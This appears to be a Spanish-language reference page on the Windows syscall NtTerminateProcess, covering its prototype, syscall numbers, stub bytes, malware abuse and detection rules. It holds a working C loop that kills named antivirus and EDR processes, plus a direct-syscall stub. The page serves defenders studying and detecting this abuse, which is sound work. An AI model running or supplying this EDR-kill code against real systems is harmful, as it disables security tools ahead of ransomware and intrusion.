NtTerminateProcess
Termina un proceso objetivo y todos sus hilos con un código de salida dado.
Prototipo
NTSTATUS NtTerminateProcess( HANDLE ProcessHandle, NTSTATUS ExitStatus );
Argumentos
| Name | Type | Dir | Description |
|---|---|---|---|
| ProcessHandle | HANDLE | in | Handle al proceso a terminar. Requiere PROCESS_TERMINATE. NULL significa «terminar todos los hilos del proceso actual excepto el llamador». |
| ExitStatus | NTSTATUS | in | Código de salida reportado por GetExitCodeProcess y registrado en el objeto proceso. |
IDs de syscalls por versión de Windows
| Versión de Windows | ID de syscall | Build |
|---|---|---|
| Win10 1507 | 0x2C | win10-1507 |
| Win10 1607 | 0x2C | win10-1607 |
| Win10 1703 | 0x2C | win10-1703 |
| Win10 1709 | 0x2C | win10-1709 |
| Win10 1803 | 0x2C | win10-1803 |
| Win10 1809 | 0x2C | win10-1809 |
| Win10 1903 | 0x2C | win10-1903 |
| Win10 1909 | 0x2C | win10-1909 |
| Win10 2004 | 0x2C | win10-2004 |
| Win10 20H2 | 0x2C | win10-20h2 |
| Win10 21H1 | 0x2C | win10-21h1 |
| Win10 21H2 | 0x2C | win10-21h2 |
| Win10 22H2 | 0x2C | win10-22h2 |
| Win11 21H2 | 0x2C | win11-21h2 |
| Win11 22H2 | 0x2C | win11-22h2 |
| Win11 23H2 | 0x2C | win11-23h2 |
| Win11 24H2 | 0x2C | win11-24h2 |
| Server 2016 | 0x2C | winserver-2016 |
| Server 2019 | 0x2C | winserver-2019 |
| Server 2022 | 0x2C | winserver-2022 |
| Server 2025 | 0x2C | winserver-2025 |
Módulo del kernel
APIs relacionadas
Stub del syscall
4C 8B D1 mov r10, rcx B8 2C 00 00 00 mov eax, 0x2C F6 04 25 08 03 FE 7F 01 test byte ptr [0x7FFE0308], 1 75 03 jne short +3 0F 05 syscall C3 ret CD 2E int 2Eh C3 ret
Notas no documentadas
NtTerminateProcess mantiene el SSN `0x2C` en todos los builds de Windows 10 / 11 / Server. Es la implementación de kernel detrás de TerminateProcess / ExitProcess y también lo invocan implícitamente el `_exit` del runtime C y los finalizadores SEH de excepción no manejada. Llamarlo con ProcessHandle == NULL es un atajo documentado para matar todos los hilos del proceso actual salvo el llamador — la segunda mitad del teardown de `ExitProcess`.
Uso común por malware
El abuso definitorio es el **kill de EDR / AV** (T1562.001). Ransomware moderno (Conti, LockBit, BlackCat/ALPHV, Royal, Akira) y frameworks de post-explotación combinan habitualmente un driver vulnerable BYOVD (zemana, gmer, RTCore64) con un binario en modo usuario que recorre la lista de procesos, hace match contra una allowlist hardcodeada de nombres de EDR (MsMpEng, Sense, CSFalconService, elastic-agent, ...) y o bien baja al kernel para invocar directamente ZwTerminateProcess, o bien — una vez neutralizado el callback de protección del EDR — llama NtTerminateProcess desde modo usuario con PROCESS_TERMINATE. Otros usos: abortar un proceso helper inyectado tras entregar payload de movimiento lateral y droppers autodestructivos tras pasar al segundo stage.
Oportunidades de detección
Los callbacks PsSetCreateProcessNotifyRoutineEx se disparan al salir el proceso con `Create` == FALSE e incluyen tanto el terminador como la PID víctima; es la telemetría de oro. Sysmon Event ID 5 (`ProcessTerminate`) es mucho más liviano y carece del campo terminador. ETW `Microsoft-Windows-Kernel-Process/ProcessStop` provee los mismos datos. Regla de alta fidelidad: cualquier proceso no System, no csrss que termine un proceso cuya ruta de imagen viva bajo `Program Files\Windows Defender`, `Program Files\Microsoft\Windows Defender Advanced Threat Protection`, `Program Files\CrowdStrike`, `Program Files\SentinelOne` o raíces EDR similares. Combinar con telemetría de autoprotección de EDR (intentos de violación PPL sobre `MsMpEng.exe` de Defender).
Ejemplos de syscalls directos
asmx64 direct stub
; Direct syscall stub for NtTerminateProcess (SSN 0x2C, all builds)
NtTerminateProcess PROC
mov r10, rcx ; syscall convention
mov eax, 2Ch ; SSN
syscall
ret
NtTerminateProcess ENDPcEDR kill loop (defensive PoC)
// Defensive PoC: enumerate processes, match against an EDR allowlist,
// and call NtTerminateProcess directly. Assumes prerequisites (token theft
// to SYSTEM, EDR protection callback already stripped via BYOVD) are met.
#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>
typedef NTSTATUS (NTAPI *pNtTerminateProcess)(HANDLE, NTSTATUS);
static const wchar_t *kTargets[] = {
L"MsMpEng.exe", L"MsSense.exe", L"CSFalconService.exe",
L"elastic-agent.exe", L"SentinelAgent.exe", NULL,
};
void KillEDRs(void) {
pNtTerminateProcess NtTerminateProcess = (pNtTerminateProcess)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtTerminateProcess");
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32W pe = { sizeof pe };
for (BOOL ok = Process32FirstW(snap, &pe); ok; ok = Process32NextW(snap, &pe)) {
for (size_t i = 0; kTargets[i]; ++i) {
if (_wcsicmp(pe.szExeFile, kTargets[i]) == 0) {
HANDLE h = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID);
if (h) { NtTerminateProcess(h, 0); CloseHandle(h); }
}
}
}
CloseHandle(snap);
}rustself-destruct on completion
// Cargo: windows-sys = "0.59" (Win32_System_Threading, Win32_Foundation)
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::System::Threading::GetCurrentProcess;
extern "system" {
fn NtTerminateProcess(ProcessHandle: HANDLE, ExitStatus: i32) -> i32;
}
pub fn self_destruct(code: i32) -> ! {
unsafe { NtTerminateProcess(GetCurrentProcess(), code); }
loop {}
}Mapeos MITRE ATT&CK
Last verified: 2026-05-20